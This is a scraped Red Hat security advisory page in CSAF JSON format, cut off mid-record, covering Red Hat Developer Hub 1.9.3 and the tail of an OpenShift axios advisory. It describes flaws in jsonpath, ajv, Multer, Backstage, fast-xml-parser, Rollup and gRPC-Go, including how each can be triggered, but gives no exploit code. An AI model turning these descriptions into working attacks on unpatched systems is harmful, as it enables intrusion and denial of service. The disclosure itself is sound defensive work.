"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:6802
Vulnerability from csaf_redhat - Published: 2026-04-07 13:22 - Updated: 2026-04-16 10:29A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object's prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component's reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.
A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.
A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.
A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.
A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.
A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository's `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.
A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.
A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).
A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Developer Hub 1.9.3 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6802",
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61140",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1615",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-2359",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24046",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25153",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25679",
"url": "https://access.redhat.com/security/cve/CVE-2026-25679"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25896",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26278",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27942",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3304",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3520",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
"url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
},
{
"category": "external",
"summary": "https://developers.redhat.com/rhdh/overview",
"url": "https://developers.redhat.com/rhdh/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
"url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHDHBUGS-2736",
"url": "https://issues.redhat.com/browse/RHDHBUGS-2736"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6802.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Developer Hub 1.9.3 release.",
"tracking": {
"current_release_date": "2026-04-16T10:29:46+00:00",
"generator": {
"date": "2026-04-16T10:29:46+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6802",
"initial_release_date": "2026-04-07T13:22:11+00:00",
"revision_history": [
{
"date": "2026-04-07T13:22:11+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-07T13:22:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:29:46+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Developer Hub 1.9",
"product": {
"name": "Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhdh:1.9::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Developer Hub"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1775140647"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1775140369"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-operator-bundle@sha256%3A6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1775155242"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61140",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-01-28T17:00:46.678419+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433946"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object\u0027s prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "RHBZ#2433946",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433946"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61140"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d",
"url": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath",
"url": "https://github.com/dchester/jsonpath"
}
],
"release_date": "2026-01-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
